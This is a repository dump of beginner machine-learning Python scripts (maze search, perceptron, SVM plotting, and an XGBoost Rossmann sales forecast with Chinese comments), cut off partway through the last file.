Image.open('../textures/f_swi.png')\n current_sprite = Image.open('../textures/f_sw.png')\n else:\n current_sprite = Image.open('../textures/f.png')\n current_sprite_i = Image.open('../textures/blank.png')\n\n img.paste(current_sprite, (x * 10, y * 10))\n draw.bitmap((x * 10, y * 10), current_sprite_i, fill=(0,green,255))\n\n'''\n"
}
] | 1 |
weinanfu/Machine-Learning | https://github.com/weinanfu/Machine-Learning | 9c6900e780521e661459c522e67bde7f9233b5a2 | c9239d67a1de2fdbef6e96563cf95728d6c6b964 | df1d72e7b3b3ef07726934b863161984887e5322 | refs/heads/master | 2020-06-26T08:19:01.234835 | 2019-07-30T05:42:00 | 2019-07-30T05:42:00 | 199,582,116 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6076948642730713,
"alphanum_fraction": 0.6132851243019104,
"avg_line_length": 32.79999923706055,
"blob_id": "9379b8ddf8c763d70132351711353c3d9c8b7068",
"content_id": "af6601bd47ee4f0bbec6efb178cc32edbe1b79bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3041,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 90,
"path": "/Maze.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "import sys\n\nPART_OF_PATH = '+'\nTRIED = '.'\nOBSTACLE = '1'\nDEAD_END = '-'\n\nclass Maze:\n path = []\n def __init__(self, mazeFileName):\n columnsInMaze = 0\n self.mazelist = []\n mazeFile = open(mazeFileName, 'r')\n rowsInMaze = 0\n for line in mazeFile:\n rowList = []\n col = 0\n for ch in line:\n if ch == '1' or ch == '0':\n rowList.append(ch)\n col = col + 1\n rowsInMaze = rowsInMaze + 1\n self.mazelist.append(rowList)\n columnsInMaze = len(rowList)\n self.startRow, self.startCol = map(int, input(\"Start: \").split(','))\n self.endRow, self.endCol = map(int, input(\"End: \").split(','))\n if self.mazelist[self.startRow][self.startCol] == OBSTACLE or self.mazelist[self.endRow][self.endCol] == OBSTACLE:\n print(\"invalid point\")\n sys.exit()\n self.rowsInMaze = rowsInMaze\n self.columnsInMaze = columnsInMaze\n self.xTranslate = -columnsInMaze/2\n self.yTranslate = rowsInMaze/2\n\n def updatePosition(self, row, col, val=None):\n if val:\n self.mazelist[row][col] = val\n\n if val == PART_OF_PATH:\n node = []\n node.append(row)\n node.append(col)\n self.path.append(node)\n\n def returnpath(self):\n return self.path\n\n def __getitem__(self,idx):\n return self.mazelist[idx]\n\n\ndef searchFrom(maze, startRow, startColumn, endRow, endCol):\n # try each of four directions from this point until we find a way out.\n # base Case return values:\n # 1. We have run into an obstacle, return false\n maze.updatePosition(startRow, startColumn)\n if maze[startRow][startColumn] == OBSTACLE :\n return False\n # 2. We have found a square that has already been explored\n if maze[startRow][startColumn] == TRIED or maze[startRow][startColumn] == DEAD_END:\n return False\n # 3. We have found an outside edge not occupied by an obstacle\n if startRow == endRow and startColumn == endCol:\n print('Yes')\n maze.updatePosition(startRow, startColumn, PART_OF_PATH)\n return True\n maze.updatePosition(startRow, startColumn, TRIED)\n # Otherwise, use logical short circuiting to try each direction\n # in turn (if needed)\n found = searchFrom(maze, startRow-1, startColumn, endRow, endCol) or \\\n searchFrom(maze, startRow+1, startColumn, endRow, endCol) or \\\n searchFrom(maze, startRow, startColumn-1, endRow, endCol) or \\\n searchFrom(maze, startRow, startColumn+1, endRow, endCol)\n if found:\n maze.updatePosition(startRow, startColumn, PART_OF_PATH)\n\n else:\n maze.updatePosition(startRow, startColumn, DEAD_END)\n return found\n\nmyMaze = Maze('maze.txt')\n\nmyMaze.updatePosition(myMaze.startRow, myMaze.startCol)\n\nsearchFrom(myMaze, myMaze.startRow, myMaze.startCol,myMaze.endRow,myMaze.endCol)\n\na = myMaze.returnpath()\na.reverse()\nfor i in a:\n print(i)"
},
{
"alpha_fraction": 0.4983624517917633,
"alphanum_fraction": 0.5453056693077087,
"avg_line_length": 23.413333892822266,
"blob_id": "a3ec16ec5c881a98175acc57fef5e98def7be72b",
"content_id": "cd73d0deba4a9fb89522988799e4a18db81c3057",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1898,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 75,
"path": "/perceptron/Perceptron.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n\n# 感知机学习算法\ndef Percetron_Learning(X, y, learning_rate):\n m, n = X.shape\n w_record = []\n X = np.column_stack((X, np.ones(m)))\n w = np.random.random(n + 1)\n w_record.append(w.copy())\n iter = 0\n while True:\n i = np.random.randint(m)\n if y[i] * (w.dot(X[i, :])) <= 0:\n w = w + learning_rate * y[i] * X[i, :]\n w_record.append(w.copy())\n iter += 1\n print(\"第\" + str(iter) + \"次修正\")\n continue\n predict = sgn(X, w)\n if np.all(predict == y):\n break\n return w, w_record\n\n\n# 指示函数\ndef sgn(X, w):\n predict = np.dot(X, w)\n predict[predict > 0] = 1\n predict[predict < 0] = -1\n predict[predict == 0] = 0\n return predict\n\n\n# 二维测试数据生成\nmean1 = [0, 0]\ncov1 = [[1, 0], [0, 1]]\nmean2 = [3, 3]\ncov2 = [[1, 0], [0, 1]]\nX1 = np.random.multivariate_normal(mean1, cov1, 50)\nX2 = np.random.multivariate_normal(mean2, cov2, 50)\n# 绘制散点图\nplt.scatter(X1[:, 0], X1[:, 1])\nplt.scatter(X2[:, 0], X2[:, 1])\n# PLA算法求系数\nX = np.row_stack((X1, X2))\ny = np.ones(100)\ny[0:50] = -1\nw, w_record = Percetron_Learning(X, y, 0.01)\n\nfig, ax = plt.subplots()\nax.scatter(X1[:, 0], X1[:, 1])\nax.scatter(X2[:, 0], X2[:, 1])\nx = np.arange(X.min() - 1, X.max() + 1, 0.01)\nw0 = w_record[0]\nline, = ax.plot(x, (-w0[0] * x - w0[2]) / w0[1])\n\n\ndef init(): # only required for blitting to give a clean slate.\n line.set_ydata([np.nan] * len(x))\n return line,\n\n\ndef animate(i):\n if i == len(w_record):\n return\n w = w_record[i]\n line.set_ydata((-w[0] * x - w[2]) / w[1]) # update the data.\n return line,\n\n\nani = animation.FuncAnimation(fig, animate, init_func=init, interval=2, blit=True, save_count=50)\nax.plot(x, (-w[0] * x - w[2]) / w[1])\n\n"
},
{
"alpha_fraction": 0.6193236708641052,
"alphanum_fraction": 0.6318840384483337,
"avg_line_length": 26.972972869873047,
"blob_id": "dbf574fb2b242a62e25b0f5c32a0984079182060",
"content_id": "2dd072398abc9114cb487d19c69cee3cfd7c3c13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3105,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 111,
"path": "/perceptron/T.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "from random import seed\nfrom random import randrange\nfrom csv import reader\nimport numpy as np\n\n\n# Load a CSV file\ndef load_csv(filename):\n unknown = '?'\n dataset = list()\n with open(filename, 'r') as file:\n csv_reader = reader(file)\n for index, row in enumerate(csv_reader):\n if unknown in list(row) or index == 0:\n continue\n dataset.append(row)\n return dataset\n\n\n# Convert string column to float\ndef str_column_to_float(dataset, column):\n for row in dataset:\n row[column] = float(row[column].strip())\n\n# Convert third column\ndef int_column_to_float(dataset, column):\n for row in dataset:\n row[column] = float(row[column])\n\ndef int_column_to_floatone(dataset, column):\n for row in dataset:\n row[column] = float(row[column]/10000)\n\ndef int_column_to_floattwo(dataset, column):\n for row in dataset:\n row[column] = float(row[column]/1000)\n\n# Convert string column to integer\ndef str_column_to_index(dataset, column):\n class_values = [row[column] for row in dataset]\n unique = set(class_values)\n lookup = dict()\n for i, value in enumerate(unique):\n lookup[value] = i\n for row in dataset:\n row[column] = lookup[row[column]]\n return lookup\n\n# Split a dataset into k folds\ndef cross_validation_split(dataset, n_folds):\n dataset_split = list()\n dataset_copy = list(dataset)\n fold_size = int(len(dataset) / n_folds)\n for i in range(n_folds):\n fold = list()\n while len(fold) < fold_size:\n index = randrange(len(dataset_copy))\n fold.append(dataset_copy.pop(index))\n dataset_split.append(fold)\n return dataset_split\n\n\n# Calculate accuracy percentage\ndef accuracy_metric(actual, predicted):\n correct = 0\n for i in range(len(actual)):\n if actual[i] == predicted[i]:\n correct += 1\n return correct / float(len(actual)) * 100.0\n\n\n# Evaluate an algorithm using a cross validation split\ndef evaluate_algorithm(dataset, algorithm, n_folds, *args):\n folds = cross_validation_split(dataset, n_folds)\n scores = list()\n for fold in folds:\n train_set = list(folds)\n train_set.remove(fold)\n train_set = sum(train_set, [])\n test_set = list()\n for row in fold:\n row_copy = list(row)\n test_set.append(row_copy)\n row_copy[-1] = None\n predicted = algorithm(train_set, test_set, *args)\n actual = [row[-1] for row in fold]\n accuracy = accuracy_metric(actual, predicted)\n scores.append(accuracy)\n return scores\n\n\n\nseed(1)\n# load and prepare data\nfilename = 'adult.csv'\ndataset = load_csv(filename)\nmatrix = [0,2,4,10,11,12]\nfor i in range(len(dataset[0])):\n if i in matrix:\n str_column_to_float(dataset, i)\n else:\n str_column_to_index(dataset, i)\n int_column_to_float(dataset, i)\nint_column_to_floatone(dataset, 2)\nint_column_to_floattwo(dataset, 11)\nint_column_to_floattwo(dataset, 10)\nm = np.array(dataset)\ndataMat = m[:,0:len(m[0])-1]\nlabelMat = m[:,len(m[0])-1]\n\nprint(labelMat)\n"
},
{
"alpha_fraction": 0.5375657677650452,
"alphanum_fraction": 0.5608565211296082,
"avg_line_length": 28.25274658203125,
"blob_id": "4c83913795c7ec1847cf67b37e9901bf729eb101",
"content_id": "1786b1fd149ae34ffc2da719312a1d1c54e2be4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2688,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 91,
"path": "/perceptron/testplottttt.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import svm, datasets\n\ndef loadDataSet(filename):\n a=np.load(filename)\n dataset=[]\n labels=[]\n for i in a:\n x,y=i[5],i[7]\n dataset.append([x,y])\n labels.append(i[14])\n return np.array(dataset), np.array(labels)\n\ndef make_meshgrid(x, y, h=.02):\n x_min, x_max = 0,1\n y_min, y_max = 0,1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy\n\n\ndef plot_contours(ax, clf, xx, yy, **params):\n\n Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n out = ax.contourf(xx, yy, Z, **params)\n return out\n\ndef main():\n data = 'nomalized_samples.npy'\n feature, lable = loadDataSet(data)\n dataArr_test = feature[:3000]\n labelArr_test = lable[:3000]\n x1_samples = []\n x2_samples = []\n\n for i in range(3000):\n q = dataArr_test[i]\n\n if labelArr_test[i] == 1:\n x1_samples.append(q)\n else:\n x2_samples.append(q)\n x1 = np.array(x1_samples)\n x2 = np.array(x2_samples)\n # import some data to play with\n\n # Take the first two features. We could avoid this by using a two-dim dataset\n X = np.concatenate((x1, x2), axis=0)\n y = np.array(labelArr_test)\n\n # we create an instance of SVM and fit out data. We do not scale our\n # data since we want to plot the support vectors\n C = 150.0 # SVM regularization parameter\n models = (svm.SVC(kernel='linear', C=C),\n svm.LinearSVC(C=C),\n svm.SVC(kernel='rbf', gamma=0.7, C=C),\n svm.SVC(kernel='poly', degree=3, C=C))\n models = (clf.fit(X, y) for clf in models)\n\n # title for the plots\n titles = ('SVC with linear kernel',\n 'LinearSVC (linear kernel)',\n 'SVC with RBF kernel',\n 'SVC with polynomial (degree 3) kernel')\n\n # Set-up 2x2 grid for plotting.\n fig, sub = plt.subplots(2, 2)\n plt.subplots_adjust(wspace=0.4, hspace=0.4)\n\n X0, X1 = X[:, 0], X[:, 1]\n xx, yy = make_meshgrid(X0, X1)\n\n for clf, title, ax in zip(models, titles, sub.flatten()):\n # 画出预测结果\n plot_contours(ax, clf, xx, yy,\n cmap=plt.cm.coolwarm, alpha=0.8)\n # 把原始点画上去\n ax.scatter(X0, X1, c=y, cmap=plt.cm.coolwarm, s=20, edgecolors='k')\n ax.set_xlim(xx.min(), xx.max())\n ax.set_ylim(yy.min(), yy.max())\n ax.set_xlabel('Sepal length')\n ax.set_ylabel('Sepal width')\n ax.set_xticks(())\n ax.set_yticks(())\n ax.set_title(title)\n plt.show()\n\nif __name__=='__main__':\n main()\n"
},
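plot_contours above follows the usual scikit-learn decision-surface recipe: rasterize the plane with a meshgrid, predict on every grid point, and reshape back for contourf. A minimal self-contained sketch of that round-trip, with a stand-in rule in place of a fitted classifier:

import numpy as np

xx, yy = np.meshgrid(np.arange(0, 1, 0.25), np.arange(0, 1, 0.25))
grid = np.c_[xx.ravel(), yy.ravel()]   # (n_points, 2), the shape predict() expects
z = (grid[:, 0] + grid[:, 1] > 1.0)    # stand-in for clf.predict(grid)
Z = z.reshape(xx.shape)                # back to grid shape for ax.contourf(xx, yy, Z)
print(Z.astype(int))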
{
"alpha_fraction": 0.7538071274757385,
"alphanum_fraction": 0.7631133794784546,
"avg_line_length": 44.5,
"blob_id": "379f48b0210736c04877ed4f8b9500982bbf3f6b",
"content_id": "99eb2b9b0103ccf5f649f1d08020e27911756340",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1182,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 26,
"path": "/KNN.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "from sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.cross_validation import train_test_split, cross_val_score\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.metrics import accuracy_score, roc_auc_score, roc_curve\nfrom sklearn.preprocessing import binarize\nimport pandas as pd\nimport matplotlib.pyplot as plt\n%matplotlib inline\n# features info : https://goo.gl/p8ocBn\ncol_names = ['pregnant', 'glucose', 'bp', 'skin', 'insulin', 'bmi', 'pedigree', 'age', 'label']\n# initialization of the Dataset\ndata = pd.read_csv('pima-indians-diabetes.data', names=col_names)\n# checking if there is not empty fields (SKL require none empty field)\ndata.count()\ndata.head()\n# selection of relevant features\nlabel = data['label']\ndata.drop('label', axis=1, inplace=True)\n\nX, y = data, label\n# distributing our Dataset into a training and testing distribution\n# we use the default SKL split (0.75 (75%) for training)\n# random_state=0 Setting the random seed (for reproductibility purpose)\nX_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)\n# counting the split of Positive (1) and Negative (0) labels in our testing distribution\ny_test.value_counts()"
},
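train_test_split above keeps scikit-learn's default 75/25 split and fixes the random seed. A minimal sketch of the same call with hypothetical arrays standing in for the diabetes dataframe:

import numpy as np
from sklearn.model_selection import train_test_split

X = np.arange(20).reshape(10, 2)   # hypothetical feature matrix
y = np.arange(10) % 2              # hypothetical binary labels
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
print(X_train.shape, X_test.shape)  # (7, 2) (3, 2): default keeps 75% for training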
{
"alpha_fraction": 0.6120689511299133,
"alphanum_fraction": 0.6501668691635132,
"avg_line_length": 24.820466995239258,
"blob_id": "06b140b9fa90ed3b18875b2450462040d3fb4f52",
"content_id": "74e0327ed3add946ec7ad74829f79005a4e9797a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17856,
"license_type": "no_license",
"max_line_length": 330,
"num_lines": 557,
"path": "/Salesforecast/Salesforecast.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "\n# coding: utf-8\n\n# 开发环境:windows10, Anacoda3.5 , jupyter notebook ,python3.6 \n# 库: numpy,pandas,matplotlib,seaborn,xgboost,time\n# 运行时间:CPU: i7-6700HQ,约8h\n\n# 项目名称: Rossmann 销售预测\n\n# 1.数据分析\n\n# In[1]:\n\n\n# 导入所需要的库\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport xgboost as xgb\nfrom time import time\n\n\n# In[2]:\n\n\n# 读取数据\ntrain = pd.read_csv('train.csv' ,parse_dates=[2])\ntest = pd.read_csv('test.csv' ,parse_dates=[3])\nstore = pd.read_csv('store.csv')\n\n\n# In[3]:\n\n\n# 查看训练集\ntrain.head().append(train.tail())\n\n\n# In[4]:\n\n\n# 查看测试集\ntest.head().append(test.tail())\n\n\n# In[5]:\n\n\n# 查看店铺信息\nstore.head().append(store.tail())\n\n\n# In[6]:\n\n\n# 查看数据缺失\ndisplay(train.isnull().sum() ,test.isnull().sum() ,store.isnull().sum())\n\n\n# In[7]:\n\n\n# 缺失数据分析\n# 测试集缺失数据\ntest[pd.isnull(test.Open)]\n\n\n# - 缺失数据都来自于622店铺,从周1到周6而且没有假期,所以我们认为这个店铺的状态应该是正常营业的\n\n# In[8]:\n\n\n# 店铺集缺失数据\nstore[pd.isnull(store.CompetitionDistance)]\n\n\n# In[9]:\n\n\nstore[pd.isnull(store.CompetitionOpenSinceMonth)].head(10)\n\n\n# In[10]:\n\n\n# 查看是否Promo2系列的缺失是否是因为没有参加促销\nNoPW = store[pd.isnull(store.Promo2SinceWeek)]\nNoPW[NoPW.Promo2 != 0].shape\n\n\n# - 店铺竞争数据缺失的原因不明,且数量比较多,我们可以用中值或者0来填充,后续的实验发现以0填充的效果更好\n# - 店铺促销信息的缺失是因为没有参加促销活动,所以我们以0填充\n\n# In[11]:\n\n\n# 分析店铺销量随时间的变化\nstrain = train[train.Sale s >0]\nstrain.loc[strain['Store' ]= =1 ,['Date', 'Sales']].plot(x='Date', y='Sales', title='Store1', figsize=(16, 4))\n\n# In[12]:\n\n\n# 分析店铺6-9月份的销量变化\nstrain = train[train.Sales > 0]\nstrain.loc[strain['Store'] == 1, ['Date', 'Sales']].plot(x='Date', y='Sales', title='Store1', figsize=(8, 2),\n xlim=['2014-6-1', '2014-7-31'])\nstrain.loc[strain['Store'] == 1, ['Date', 'Sales']].plot(x='Date', y='Sales', title='Store1', figsize=(8, 2),\n xlim=['2014-8-1', '2014-9-30'])\n\n# - 从上图的分析中,我们可以看到店铺的销售额是有周期性变化的,一年之中11,12月份销量要高于其他月份,可能有季节因素或者促销等原因.\n# - 此外从对2014年6月-9月份的销量来看,6,7月份的销售趋势与8,9月份类似,因为我们需要预测的6周在2015年8,9月份,因此我们可以把2015年6,7月份最近的6周数据作为hold-out数据集,用于模型的优化和验证。\n\n# 2.数据预处理\n\n# In[13]:\n\n\n# 缺失值处理\n# 我们将test中的open数据补为1,即营业状态\ntest.fillna(1, inplace=True)\n# store['CompetitionDistance'].fillna(store['CompetitionDistance'].median(), inplace = True)\n# store['CompetitionOpenScinceYear'].fillna(store['CompetitionDistance'].median(), inplace = True)\n# store['CompetitionOPenScinceMonth'].fillna(store['CompetitionDistance'].median(), inplace = True)\n\n# store中的缺失数据大多与竞争对手和促销有关,在实验中我们发现竞争对手信息的中值填充效果并不好,所以这里统一采用0填充\nstore.fillna(0, inplace=True)\n\n# In[14]:\n\n\n# 查看是否还存在缺失值\ndisplay(train.isnull().sum(), test.isnull().sum(), store.isnull().sum())\n\n# In[15]:\n\n\n# 合并store信息\ntrain = pd.merge(train, store, on='Store')\ntest = pd.merge(test, store, on='Store')\n\n# In[16]:\n\n\n# 留出最近的6周数据作为hold_out数据集进行测试\ntrain = train.sort_values(['Date'], ascending=False)\nho_test = train[:6 * 7 * 1115]\nho_train = train[6 * 7 * 1115:]\n\n# In[17]:\n\n\n# 因为销售额为0的记录不计入评分,所以只采用店铺为开,且销售额大于0的数据进行训练\nho_test = ho_test[ho_test[\"Open\"] != 0]\nho_test = ho_test[ho_test[\"Sales\"] > 0]\nho_train = ho_train[ho_train[\"Open\"] != 0]\nho_train = ho_train[ho_train[\"Sales\"] > 0]\n\n\n# 3.特征工程\n\n# In[18]:\n\n\n# 特征处理与转化,定义特征处理函数\ndef features_create(data):\n # 将存在其他字符表示分类的特征转化为数字\n mappings = {'0': 0, 'a': 1, 'b': 2, 'c': 3, 'd': 4}\n data.StoreType.replace(mappings, inplace=True)\n data.Assortment.replace(mappings, inplace=True)\n data.StateHoliday.replace(mappings, inplace=True)\n\n # 
将时间特征进行拆分和转化,并加入'WeekOfYear'特征\n data['Year'] = data.Date.dt.year\n data['Month'] = data.Date.dt.month\n data['Day'] = data.Date.dt.day\n data['DayOfWeek'] = data.Date.dt.dayofweek\n data['WeekOfYear'] = data.Date.dt.weekofyear\n\n # 新增'CompetitionOpen'和'PromoOpen'特征,计算某天某店铺的竞争对手已营业时间和店铺已促销时间,用月为单位表示\n data['CompetitionOpen'] = 12 * (data.Year - data.CompetitionOpenSinceYear) + (\n data.Month - data.CompetitionOpenSinceMonth)\n data['PromoOpen'] = 12 * (data.Year - data.Promo2SinceYear) + (data.WeekOfYear - data.Promo2SinceWeek) / 4.0\n data['CompetitionOpen'] = data.CompetitionOpen.apply(lambda x: x if x > 0 else 0)\n data['PromoOpen'] = data.PromoOpen.apply(lambda x: x if x > 0 else 0)\n\n # 将'PromoInterval'特征转化为'IsPromoMonth'特征,表示某天某店铺是否处于促销月,1表示是,0表示否\n month2str = {1: 'Jan', 2: 'Feb', 3: 'Mar', 4: 'Apr', 5: 'May', 6: 'Jun', 7: 'Jul', 8: 'Aug', 9: 'Sept', 10: 'Oct',\n 11: 'Nov', 12: 'Dec'}\n data['monthStr'] = data.Month.map(month2str)\n data.loc[data.PromoInterval == 0, 'PromoInterval'] = ''\n data['IsPromoMonth'] = 0\n for interval in data.PromoInterval.unique():\n if interval != '':\n for month in interval.split(','):\n data.loc[(data.monthStr == month) & (data.PromoInterval == interval), 'IsPromoMonth'] = 1\n\n return data\n\n\n# In[19]:\n\n\n# 对训练,保留以及测试数据集进行特征转化\nfeatures_create(ho_train)\nfeatures_create(ho_test)\nfeatures_create(test)\nprint('Features creation finished')\n\n# In[20]:\n\n\n# 删掉训练和保留数据集中不需要的特征\nho_train.drop(['Date', 'Customers', 'Open', 'PromoInterval', 'monthStr'], axis=1, inplace=True)\nho_test.drop(['Date', 'Customers', 'Open', 'PromoInterval', 'monthStr'], axis=1, inplace=True)\n\n# In[21]:\n\n\n# 分析训练数据集中特征相关性以及特征与'Sales'标签相关性\nplt.subplots(figsize=(24, 20))\nsns.heatmap(ho_train.corr(), annot=True, vmin=-0.1, vmax=0.1, center=0)\n\n# In[22]:\n\n\n# 拆分特征与标签,并将标签取对数处理\nho_xtrain = ho_train.drop(['Sales'], axis=1)\nho_ytrain = np.log1p(ho_train.Sales)\nho_xtest = ho_test.drop(['Sales'], axis=1)\nho_ytest = np.log1p(ho_test.Sales)\n\n# In[23]:\n\n\n# 删掉测试集中对应的特征与训练集保持一致\nxtest = test.drop(['Id', 'Date', 'Open', 'PromoInterval', 'monthStr'], axis=1)\n\n\n# 4.定义评价函数\n\n# In[24]:\n\n\n# 定义评价函数rmspe\ndef rmspe(y, yhat):\n return np.sqrt(np.mean((yhat / y - 1) ** 2))\n\n\ndef rmspe_xg(yhat, y):\n y = np.expm1(y.get_label())\n yhat = np.expm1(yhat)\n return \"rmspe\", rmspe(y, yhat)\n\n\n# 5.模型构建\n\n# In[25]:\n\n\n# 初始模型构建\n# 参数设定\nparams = {\"objective\": \"reg:linear\",\n \"booster\": \"gbtree\",\n \"eta\": 0.03,\n \"max_depth\": 10,\n \"subsample\": 0.9,\n \"colsample_bytree\": 0.7,\n \"silent\": 1,\n \"seed\": 10\n }\nnum_boost_round = 6000\n\ndtrain = xgb.DMatrix(ho_xtrain, ho_ytrain)\ndvalid = xgb.DMatrix(ho_xtest, ho_ytest)\nwatchlist = [(dtrain, 'train'), (dvalid, 'eval')]\n\n# 模型训练\nprint(\"Train a XGBoost model\")\nstart = time()\ngbm = xgb.train(params, dtrain, num_boost_round, evals=watchlist,\n early_stopping_rounds=100, feval=rmspe_xg, verbose_eval=True)\nend = time()\nprint('Training time is {:2f} s.'.format(end - start))\n\n# 采用保留数据集进行检测\nprint(\"validating\")\nho_xtest.sort_index(inplace=True)\nho_ytest.sort_index(inplace=True)\nyhat = gbm.predict(xgb.DMatrix(ho_xtest))\nerror = rmspe(np.expm1(ho_ytest), np.expm1(yhat))\n\nprint('RMSPE: {:.6f}'.format(error))\n\n# 6.结果分析\n\n# In[26]:\n\n\n# 构建保留数据集预测结果\nres = pd.DataFrame(data=ho_ytest)\nres['Prediction'] = yhat\nres = pd.merge(ho_xtest, res, left_index=True, right_index=True)\nres['Ratio'] = res.Prediction / res.Sales\nres['Error'] = abs(res.Ratio - 1)\nres['Weight'] = res.Sales / 
res.Prediction\nres.head()\n\n# In[27]:\n\n\n# 分析保留数据集中任意三个店铺的预测结果\ncol_1 = ['Sales', 'Prediction']\ncol_2 = ['Ratio']\nL = np.random.randint(low=1, high=1115, size=3)\nprint('Mean Ratio of predition and real sales data is {}: store all'.format(res.Ratio.mean()))\nfor i in L:\n s1 = pd.DataFrame(res[res['Store'] == i], columns=col_1)\n s2 = pd.DataFrame(res[res['Store'] == i], columns=col_2)\n s1.plot(title='Comparation of predition and real sales data: store {}'.format(i), figsize=(12, 4))\n s2.plot(title='Ratio of predition and real sales data: store {}'.format(i), figsize=(12, 4))\n print('Mean Ratio of predition and real sales data is {}: store {}'.format(s2.Ratio.mean(), i))\n\n# In[28]:\n\n\n# 分析偏差最大的10个预测结果\nres.sort_values(['Error'], ascending=False, inplace=True)\nres[:10]\n\n# - 从分析结果来看,我们的初始模型已经可以比较好的预测hold-out数据集的销售趋势,但是相对真实值,我们的模型的预测值整体要偏高一些。从对偏差数据分析来看,偏差最大的3个数据也是明显偏高。因此我们可以以hold-out数据集为标准对模型进行偏差校正。\n\n# 7.模型优化\n\n# In[29]:\n\n\n# 7.1偏差整体校正优化\nprint(\"weight correction\")\nW = [(0.990 + (i / 1000)) for i in range(20)]\nS = []\nfor w in W:\n error = rmspe(np.expm1(ho_ytest), np.expm1(yhat * w))\n print('RMSPE for {:.3f}:{:.6f}'.format(w, error))\n S.append(error)\nScore = pd.Series(S, index=W)\nScore.plot()\nBS = Score[Score.values == Score.values.min()]\nprint ('Best weight for Score:{}'.format(BS))\n\n# - 当校正系数为0.995时,hold-out集的RMSPE得分最低:0.118889,相对于初始模型 0.125453得分有很大的提升。\n\n# - 因为每个店铺都有自己的特点,而我们设计的模型对不同的店铺偏差并不完全相同,所以我们需要根据不同的店铺进行一个细致的校正。\n\n# In[30]:\n\n\n# 7.2细致校正:以不同的店铺分组进行细致校正,每个店铺分别计算可以取得最佳RMSPE得分的校正系数\nL = range(1115)\nW_ho = []\nW_test = []\nfor i in L:\n s1 = pd.DataFrame(res[res['Store'] == i + 1], columns=col_1)\n s2 = pd.DataFrame(xtest[xtest['Store'] == i + 1])\n W1 = [(0.990 + (i / 1000)) for i in range(20)]\n S = []\n for w in W1:\n error = rmspe(np.expm1(s1.Sales), np.expm1(s1.Prediction * w))\n S.append(error)\n Score = pd.Series(S, index=W1)\n BS = Score[Score.values == Score.values.min()]\n a = np.array(BS.index.values)\n b_ho = a.repeat(len(s1))\n b_test = a.repeat(len(s2))\n W_ho.extend(b_ho.tolist())\n W_test.extend(b_test.tolist())\n\n# In[31]:\n\n\n# 计算校正后整体数据的RMSPE得分\nyhat_new = yhat * W_ho\nerror = rmspe(np.expm1(ho_ytest), np.expm1(yhat_new))\nprint ('RMSPE for weight corretion {:6f}'.format(error))\n\n# - 细致校正后的hold-out集的得分为0.112010,相对于整体校正的0.118889的得分又有不小的提高\n\n# In[32]:\n\n\n# 用初始和校正后的模型对训练数据集进行预测\nprint(\"Make predictions on the test set\")\ndtest = xgb.DMatrix(xtest)\ntest_probs = gbm.predict(dtest)\n\n# 初始模型\nresult = pd.DataFrame({\"Id\": test['Id'], 'Sales': np.expm1(test_probs)})\nresult.to_csv(\"Rossmann_submission_1.csv\", index=False)\n\n# 整体校正模型\nresult = pd.DataFrame({\"Id\": test['Id'], 'Sales': np.expm1(test_probs * 0.995)})\nresult.to_csv(\"Rossmann_submission_2.csv\", index=False)\n\n# 细致校正模型\nresult = pd.DataFrame({\"Id\": test['Id'], 'Sales': np.expm1(test_probs * W_test)})\nresult.to_csv(\"Rossmann_submission_3.csv\", index=False)\n\n# - 然后我们用不同的seed训练10个模型,每个模型单独进行细致偏差校正后进行融合.\n\n# In[33]:\n\n\n# 7.2训练融合模型\nprint(\"Train an new ensemble XGBoost model\")\nstart = time()\nrounds = 10\npreds_ho = np.zeros((len(ho_xtest.index), rounds))\npreds_test = np.zeros((len(test.index), rounds))\nB = []\nfor r in range(rounds):\n print('round {}:'.format(r + 1))\n\n params = {\"objective\": \"reg:linear\",\n \"booster\": \"gbtree\",\n \"eta\": 0.03,\n \"max_depth\": 10,\n \"subsample\": 0.9,\n \"colsample_bytree\": 0.7,\n \"silent\": 1,\n \"seed\": r + 1\n }\n num_boost_round = 6000\n gbm = xgb.train(params, dtrain, num_boost_round, 
